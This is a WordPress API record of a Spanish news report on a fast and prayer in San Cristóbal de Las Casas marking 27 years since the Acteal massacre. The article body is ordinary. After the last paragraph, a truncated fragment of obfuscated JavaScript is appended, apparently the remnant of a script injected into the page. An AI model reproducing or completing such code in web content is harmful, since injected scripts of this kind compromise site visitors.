{"id":19432,"date":"2024-12-23T02:09:32","date_gmt":"2024-12-23T02:09:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19432"},"modified":"2024-12-23T02:09:33","modified_gmt":"2024-12-23T02:09:33","slug":"jornada-de-ayuno-y-oracion-en-recordatorio-de-la-masacre-de-acteal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19432","title":{"rendered":"Jornada de ayuno y oraci\u00f3n en recordatorio de la Masacre de Acteal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"986\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734919125249.jpg\" alt=\"\" class=\"wp-image-19433\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734919125249.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734919125249-219x300.jpg 219w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<br>22 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- La mesa directiva de la organizaci\u00f3n Sociedad Civil Las Abejas de Acteal llev\u00f3 a cabo este fin de semana una jornada de ayuno y oraci\u00f3n en la iglesia de Guadalupe, de esta ciudad para conmemorar los 27 a\u00f1os de la masacre de Acteal, ocurrida el 22 de diciembre de 1997, cuando 45 ind\u00edgenas y cuatro no nacidos fueron asesinados brutalmente.<\/p>\n\n\n\n<p>El evento cont\u00f3 con la participaci\u00f3n de miembros de la organizaci\u00f3n, quienes recordaron a las v\u00edctimas de esa tragedia y reafirmaron su lucha por la justicia. En paralelo, otro grupo se traslad\u00f3 a la ciudad para realizar una ceremonia religiosa en memoria del sacerdote Marcelo P\u00e9rez P\u00e9rez, quien tambi\u00e9n fue asesinado en ese per\u00edodo.<\/p>\n\n\n\n<p>Durante la jornada de ayuno y oraci\u00f3n, los asistentes expresaron que su objetivo era rendir homenaje a los ind\u00edgenas ca\u00eddos aquel fat\u00eddico d\u00eda, as\u00ed como mantener vivo el reclamo por la justicia que a\u00fan esperan desde hace m\u00e1s de dos d\u00e9cadas. En este sentido, Las Abejas denunciaron que los responsables materiales de los homicidios fueron liberados por la Suprema Corte de Justicia de la Naci\u00f3n (SCJN), lo que consideran una injusticia que a\u00fan persiste.<\/p>\n\n\n\n<p>El obispo auxiliar de la Di\u00f3cesis de San Crist\u00f3bal, Luis Manuel L\u00f3pez Alfaro, estuvo presente en la jornada, uni\u00e9ndose a la oraci\u00f3n y reflexi\u00f3n por las v\u00edctimas. En su intervenci\u00f3n, destac\u00f3 la importancia de continuar trabajando por la paz, mencionando que &#8220;como iglesia, seguiremos buscando la paz en el mundo&#8221;.<\/p>\n\n\n\n<p>Asimismo, se llev\u00f3 a cabo una serie de actos religiosos en la ermita de San Pedro Chenalh\u00f3, a los cuales asistir\u00e1n representantes de diversas organizaciones y feligreses cat\u00f3licos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal22 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- La mesa directiva de la organizaci\u00f3n Sociedad Civil Las Abejas de Acteal llev\u00f3 a cabo este fin de semana una jornada de ayuno y oraci\u00f3n en la iglesia de Guadalupe, de esta ciudad para conmemorar los 27 a\u00f1os de la masacre de Acteal, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19433,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19432","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19432"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19432\/revisions"}],"predecessor-version":[{"id":19434,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19432\/revisions\/19434"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19433"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}